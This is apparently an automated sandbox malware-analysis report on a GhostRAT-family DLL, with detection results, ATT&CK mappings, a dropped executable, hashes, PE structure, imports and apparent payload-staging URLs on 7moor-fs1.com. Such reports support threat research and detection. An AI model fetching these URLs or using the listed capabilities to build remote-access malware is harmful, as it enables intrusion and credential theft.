                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6908, type: MEMORYSTR
                  Source: Yara matchFile source: ZfJheGhddq.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: ZfJheGhddq.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: ZfJheGhddq.dll, type: SAMPLE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10023650 socket,bind,getsockname,inet_addr,0_2_10023650
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10023A10 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,0_2_10023A10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10023650 socket,bind,getsockname,inet_addr,3_2_10023650
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10023A10 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,3_2_10023A10
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  111
                  Input Capture
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts12
                  Service Execution
                  1
                  Create Account
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop Protocol111
                  Input Capture
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt111
                  Windows Service
                  1
                  Access Token Manipulation
                  3
                  Obfuscated Files or Information
                  Security Account Manager1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  SteganographyAutomated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Bootkit
                  111
                  Windows Service
                  1
                  Timestomp
                  NTDS2
                  File and Directory Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script23
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets15
                  System Information Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials1
                  Network Share Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync12
                  Security Software Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job23
                  Process Injection
                  Proc Filesystem12
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Bootkit
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Rundll32
                  Network Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Indicator Removal
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1557655 Sample: ZfJheGhddq.dll Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 6 other signatures 2->46 9 loaddll32.exe 1 2->9         started        process3 signatures4 48 Found evasive API chain (may stop execution after checking mutex) 9->48 50 Contains functionality to automate explorer (e.g. start an application) 9->50 52 Contains functionality to infect the boot sector 9->52 54 4 other signatures 9->54 12 rundll32.exe 1 9->12         started        16 cmd.exe 1 9->16         started        18 conhost.exe 9->18         started        process5 file6 38 C:\Users\Public\Documents\MM\svchos1.exe, PE32 12->38 dropped 56 Found evasive API chain (may stop execution after checking mutex) 12->56 58 Contains functionality to automate explorer (e.g. start an application) 12->58 60 Contains functionality to infect the boot sector 12->60 62 3 other signatures 12->62 20 cmd.exe 12->20         started        22 cmd.exe 12->22         started        24 rundll32.exe 1 16->24         started        signatures7 process8 process9 26 conhost.exe 20->26         started        28 conhost.exe 22->28         started        30 cmd.exe 2 24->30         started        32 cmd.exe 24->32         started        process10 34 conhost.exe 30->34         started        36 conhost.exe 32->36         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  ZfJheGhddq.dll66%ReversingLabsWin32.Downloader.GhostRAT
                  ZfJheGhddq.dll100%AviraBDS/Zegost.lloamn
                  ZfJheGhddq.dll100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\Public\Documents\MM\svchos1.exe0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://localhost.ptlogin2.qq.com:4301%sAccept-Language:0%Avira URL Cloudsafe
                  https://ssl.ptlogin2.qq.com%sAccept-Language:0%Avira URL Cloudsafe
                  http://ptlogin2.qun.qq.com%sAccept-Language:0%Avira URL Cloudsafe
                  https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt0%Avira URL Cloudsafe
                  https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps://0%Avira URL Cloudsafe
                  https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt0%Avira URL Cloudsafe
                  http://qun.qq.com%sAccept-Language:0%Avira URL Cloudsafe
                  No contacted domains info
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ssl.ptlogin2.qq.com%sloaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllfalse
                    high
                    https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txtloaddll32.exe, loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://localhost.ptlogin2.qq.com:4301%sAccept-Language:loaddll32.exe, rundll32.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllfalse
                      high
                      https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txtloaddll32.exe, loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ssl.ptlogin2.qq.com%sAccept-Language:loaddll32.exe, rundll32.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ptlogin2.qun.qq.com%sloaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllfalse
                        high
                        http://ptlogin2.qun.qq.com%sAccept-Language:loaddll32.exe, rundll32.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        http://qun.qq.com%sloaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllfalse
                          high
                          https://localhost.ptlogin2.qq.com:4301%sloaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllfalse
                            high
                            http://qun.qq.com%sAccept-Language:loaddll32.exe, rundll32.exefalse
                            • Avira URL Cloud: safe
                            unknown
                            https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps://loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dllfalse
                            • Avira URL Cloud: safe
                            unknown
                            No contacted IP infos
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1557655
                            Start date and time:2024-11-18 14:10:54 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 38s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:18
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:ZfJheGhddq.dll
                            renamed because original name is a hash value
                            Original Sample Name:57eff460128e65204d46aa5a0012f8ba4758fa76a74d9dabe5d4b4b0bd1b11cc.dll
                            Detection:MAL
                            Classification:mal100.bank.troj.spyw.evad.winDLL@20/1@0/0
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 9
                            • Number of non-executed functions: 279
                            Cookbook Comments:
                            • Found application associated with file extension: .dll
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • VT rate limit hit for: ZfJheGhddq.dll
                            No simulations
                            No context
                            No context
                            No context
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\Public\Documents\MM\svchos1.exePD5dVJNpz7.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                              7YtmCkMUx3.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                tROeAyXq2X.exeGet hashmaliciousMimikatz, RunningRATBrowse
                                  me.exeGet hashmaliciousRunningRATBrowse
                                    gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                                      uHmFQqHIIA.exeGet hashmaliciousRunningRATBrowse
                                        ofR1Hd4NPM.exeGet hashmaliciousRunningRATBrowse
                                          9JQ3JboYdz.exeGet hashmaliciousRunningRATBrowse
                                            3B1TaPwSlt.exeGet hashmaliciousRunningRATBrowse
                                              2Syx0ZLsgo.exeGet hashmaliciousRunningRATBrowse
                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):61440
                                                Entropy (8bit):6.199746098562656
                                                Encrypted:false
                                                SSDEEP:1536:H9ykYCTdiHQKrFXmw2RQln5IUmDjoX6+:HlMHprF2nRQln5I
                                                MD5:889B99C52A60DD49227C5E485A016679
                                                SHA1:8FA889E456AA646A4D0A4349977430CE5FA5E2D7
                                                SHA-256:6CBE0E1F046B13B29BFA26F8B368281D2DDA7EB9B718651D5856F22CC3E02910
                                                SHA-512:08933106EAF338DD119C45CBF1F83E723AFF77CC0F8D3FC84E36253B1EB31557A54211D1D5D1CB58958188E32064D451F6C66A24B3963CCCD3DE07299AB90641
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: PD5dVJNpz7.dll, Detection: malicious, Browse
                                                • Filename: 7YtmCkMUx3.dll, Detection: malicious, Browse
                                                • Filename: tROeAyXq2X.exe, Detection: malicious, Browse
                                                • Filename: me.exe, Detection: malicious, Browse
                                                • Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
                                                • Filename: uHmFQqHIIA.exe, Detection: malicious, Browse
                                                • Filename: ofR1Hd4NPM.exe, Detection: malicious, Browse
                                                • Filename: 9JQ3JboYdz.exe, Detection: malicious, Browse
                                                • Filename: 3B1TaPwSlt.exe, Detection: malicious, Browse
                                                • Filename: 2Syx0ZLsgo.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.....^...^...^.pb^...^.c._...^.c._...^...^c..^.c._...^.c._...^.c._...^.c.^...^.c._...^Rich...^........PE..L...9..j.................b...........a............@..........................@............@.............................................hg...................0..........T........................... ........................m..`....................text...La.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat...............~..............@....rsrc...hg.......h..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.330682053193624
                                                TrID:
                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                • DOS Executable Generic (2002/1) 0.20%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:ZfJheGhddq.dll
                                                File size:1'269'760 bytes
                                                MD5:18ea526e9d1f36692776b2004cecd595
                                                SHA1:7d37805f3d1ffe9f43c599ae50dce96abf0a63c5
                                                SHA256:57eff460128e65204d46aa5a0012f8ba4758fa76a74d9dabe5d4b4b0bd1b11cc
                                                SHA512:b72bc75542d6847d154092d8b67947dd3d33dddd8237f5fed6faf47776f98eba726f0e9f3f02bdd8543ea366b7bb2d143f7647cde0f83a24a5489163d96d5474
                                                SSDEEP:24576:Goh41ZHE+JGXGM92i6p5a9S7N/iBtKB32Sttm7izM5GrkQPXHMtR1tD1b/tTkR7X:Akr7VTkp
                                                TLSH:A8455B43E2B64CA3D7D80034DC6AE7B677347A1C97F786737240EDDAB5A22907D2421A
                                                File Content Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........q!_..r_..r_..r...r^..ri..rY..rx.dr]..r../re..r_..r...r0..r^..r0..r[..r0..r[..r$..rX..r...rX..ri..r]..ri..r]..r..@r[..r..Br@..
                                                Icon Hash:7ae282899bbab082
                                                Entrypoint:0x1002d2eb
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x10000000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                DLL Characteristics:
                                                Time Stamp:0x6710B511 [Thu Oct 17 06:56:17 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:6718574bfa82ab04bcaf82fa9136fc6c
                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                push ebx
                                                mov ebx, dword ptr [ebp+08h]
                                                push esi
                                                mov esi, dword ptr [ebp+0Ch]
                                                push edi
                                                mov edi, dword ptr [ebp+10h]
                                                test esi, esi
                                                jne 00007FCBF4E766CBh
                                                cmp dword ptr [1012F1D4h], 00000000h
                                                jmp 00007FCBF4E766E8h
                                                cmp esi, 01h
                                                je 00007FCBF4E766C7h
                                                cmp esi, 02h
                                                jne 00007FCBF4E766E4h
                                                mov eax, dword ptr [10158600h]
                                                test eax, eax
                                                je 00007FCBF4E766CBh
                                                push edi
                                                push esi
                                                push ebx
                                                call eax
                                                test eax, eax
                                                je 00007FCBF4E766CEh
                                                push edi
                                                push esi
                                                push ebx
                                                call 00007FCBF4E765DAh
                                                test eax, eax
                                                jne 00007FCBF4E766C6h
                                                xor eax, eax
                                                jmp 00007FCBF4E76710h
                                                push edi
                                                push esi
                                                push ebx
                                                call 00007FCBF4E6A83Ah
                                                cmp esi, 01h
                                                mov dword ptr [ebp+0Ch], eax
                                                jne 00007FCBF4E766CEh
                                                test eax, eax
                                                jne 00007FCBF4E766F9h
                                                push edi
                                                push eax
                                                push ebx
                                                call 00007FCBF4E765B6h
                                                test esi, esi
                                                je 00007FCBF4E766C7h
                                                cmp esi, 03h
                                                jne 00007FCBF4E766E8h
                                                push edi
                                                push esi
                                                push ebx
                                                call 00007FCBF4E765A5h
                                                test eax, eax
                                                jne 00007FCBF4E766C5h
                                                and dword ptr [ebp+0Ch], eax
                                                cmp dword ptr [ebp+0Ch], 00000000h
                                                je 00007FCBF4E766D3h
                                                mov eax, dword ptr [10158600h]
                                                test eax, eax
                                                je 00007FCBF4E766CAh
                                                push edi
                                                push esi
                                                push ebx
                                                call eax
                                                mov dword ptr [ebp+0Ch], eax
                                                mov eax, dword ptr [ebp+0Ch]
                                                pop edi
                                                pop esi
                                                pop ebx
                                                pop ebp
                                                retn 000Ch
                                                jmp dword ptr [100B7424h]
                                                jmp dword ptr [100B7420h]
                                                jmp dword ptr [100B7418h]
                                                jmp dword ptr [100B73F4h]
                                                jmp dword ptr [100B73BCh]
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                jmp dword ptr [00000000h]
                                                Programming Language:
                                                • [ C ] VS98 (6.0) SP6 build 8804
                                                • [IMP] VS2005 build 50727
                                                • [C++] VS98 (6.0) SP6 build 8804
                                                • [ C ] VS98 (6.0) build 8168
                                                • [C++] VS98 (6.0) build 8168
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                • [LNK] VS98 (6.0) imp/exp build 8168
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0xf97400x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xf70880x190.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1990000x10.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x19a0000x66a8.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0xb70000x754.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x97d6a0x98000f2eec4c92674f4bec9bdcb253ef8e843False0.4028127569901316data6.771282314042107IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rodata0x990000x2e500x30000ca3681ca0d1b13e402ba8d29971b5f2False0.28173828125data6.052273401613891IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rotext0x9c0000x1ae920x1b000f8a1a6b3ce4b2119c3300ef12c912dcaFalse0.14991138599537038data5.991009639505281IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0xb70000x427800x43000ae9d5288d007a7a516a3de1e43c2155aFalse0.09628979127798508data3.5855875325763815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xfa0000x9e7a00x320008cdca12a810109cded9bfdd6e8346f15False0.2992724609375data5.520529248289096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x1990000x100x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x19a0000x803e0x9000f49f67bea9f3ac98de1c1a185b25a5ebFalse0.5600314670138888data5.559657345526215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                DLLImport
                                                KERNEL32.dllProcess32First, GetSystemDirectoryA, TerminateProcess, OpenProcess, ExitProcess, GetVersion, DeviceIoControl, Beep, GetVersionExA, GetModuleFileNameA, WinExec, TerminateThread, GetTickCount, GetCommandLineA, FreeConsole, GetCurrentProcessId, GetConsoleProcessList, AttachConsole, GetWindowsDirectoryA, WideCharToMultiByte, MultiByteToWideChar, GlobalSize, QueryPerformanceFrequency, QueryPerformanceCounter, LoadLibraryW, GlobalMemoryStatusEx, GetDriveTypeA, ReleaseMutex, CreateMutexA, GetCurrentThread, GetEnvironmentVariableA, GetCurrentThreadId, CreatePipe, CopyFileA, lstrcpyW, Module32Next, lstrcmpiA, Module32First, CreateRemoteThread, GetProcessId, ResumeThread, OpenThread, Thread32Next, Thread32First, SuspendThread, Process32Next, GlobalMemoryStatus, GetComputerNameA, GetPrivateProfileStringA, SystemTimeToTzSpecificLocalTime, lstrcpynA, lstrcmpA, lstrcatA, CreateProcessA, GetProcAddress, lstrcpyA, CreateDirectoryA, GetLastError, DeleteFileA, GetCurrentProcess, IsWow64Process, SetFilePointer, WriteFile, CreateFileA, GetFileSize, ReadFile, lstrlenA, FreeLibrary, IsBadReadPtr, VirtualProtect, HeapReAlloc, HeapAlloc, GetProcessHeap, HeapFree, CancelIo, SetEvent, ResetEvent, CreateEventA, LocalAlloc, LocalReAlloc, LocalSize, LocalFree, Sleep, GetFileAttributesA, GetModuleHandleA, GetLocalTime, GlobalAlloc, GlobalLock, GlobalFree, GlobalUnlock, CreateThread, VirtualAlloc, EnterCriticalSection, LeaveCriticalSection, VirtualFree, DeleteCriticalSection, InitializeCriticalSection, InterlockedExchange, CreateToolhelp32Snapshot, GetFileAttributesExA, FileTimeToSystemTime, MoveFileA, SetFileAttributesA, RemoveDirectoryA, FindFirstFileA, FindNextFileA, FindClose, GetLogicalDriveStringsA, GetVolumeInformationA, GetPriorityClass, GetDiskFreeSpaceExA, WaitForSingleObject, CloseHandle, LoadLibraryA, GetSystemInfo
                                                USER32.dllSetRect, GetCursorPos, GetCursorInfo, PostMessageA, SetCursorPos, WindowFromPoint, SetCapture, MapVirtualKeyA, SystemParametersInfoA, ReleaseDC, BlockInput, DestroyCursor, LoadCursorA, GetDC, GetSystemMetrics, ChangeDisplaySettingsA, FindWindowA, ShowWindow, MoveWindow, GetWindowRect, SwapMouseButton, ExitWindowsEx, EnumWindows, GetKeyState, GetAsyncKeyState, GetForegroundWindow, GetWindowTextA, CharNextA, GetDesktopWindow, wsprintfA, EmptyClipboard, SetClipboardData, OpenClipboard, GetClipboardData, CloseClipboard, GetWindowLongA, PostQuitMessage, SetWindowLongA, LoadIconA, SetClassLongA, DestroyWindow, SetFocus, GetWindowTextLengthA, SetWindowTextA, SetDlgItemTextA, CreateDialogIndirectParamA, GetDlgItem, SetWindowPos, OpenInputDesktop, GetDlgItemTextA, CloseDesktop, GetThreadDesktop, GetUserObjectInformationA, SetThreadDesktop, GetWindowThreadProcessId, WaitForInputIdle, GetClassNameA, GetWindow, GetLastInputInfo, IsIconic, MessageBoxA, IsWindowVisible, GetMessageA, IsDialogMessageA, TranslateMessage, SendMessageA, DispatchMessageA
                                                GDI32.dllGetDeviceCaps, CreateDIBSection, CreateCompatibleDC, DeleteObject, DeleteDC, BitBlt, GetRegionData, CombineRgn, CreateRectRgnIndirect, GetDIBits, CreateCompatibleBitmap, SelectObject
                                                ADVAPI32.dllRegOpenKeyA, GetTokenInformation, LookupAccountSidA, AbortSystemShutdownA, RegCloseKey, RegOpenKeyExA, GetUserNameA, CloseEventLog, ClearEventLogA, OpenEventLogA, RegSetValueExA, RegCreateKeyA, StartServiceA, CloseServiceHandle, OpenServiceA, OpenSCManagerA, SetServiceStatus, DeleteService, FreeSid, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, AllocateAndInitializeSid, RegEnumValueA, RegEnumKeyExA, RegQueryValueExA, RegDeleteValueA, RegDeleteKeyA, RegQueryInfoKeyA, RegCreateKeyExA, UnlockServiceDatabase, ChangeServiceConfigA, LockServiceDatabase, ControlService, QueryServiceStatus, QueryServiceConfig2A, QueryServiceConfigA, EnumServicesStatusA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, CheckTokenMembership
                                                SHELL32.dllShellExecuteExA, SHGetFolderPathA, SHGetSpecialFolderPathA, SHGetFileInfoA, ShellExecuteA
                                                ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                OLEAUT32.dllSysFreeString
                                                MFC42.DLL
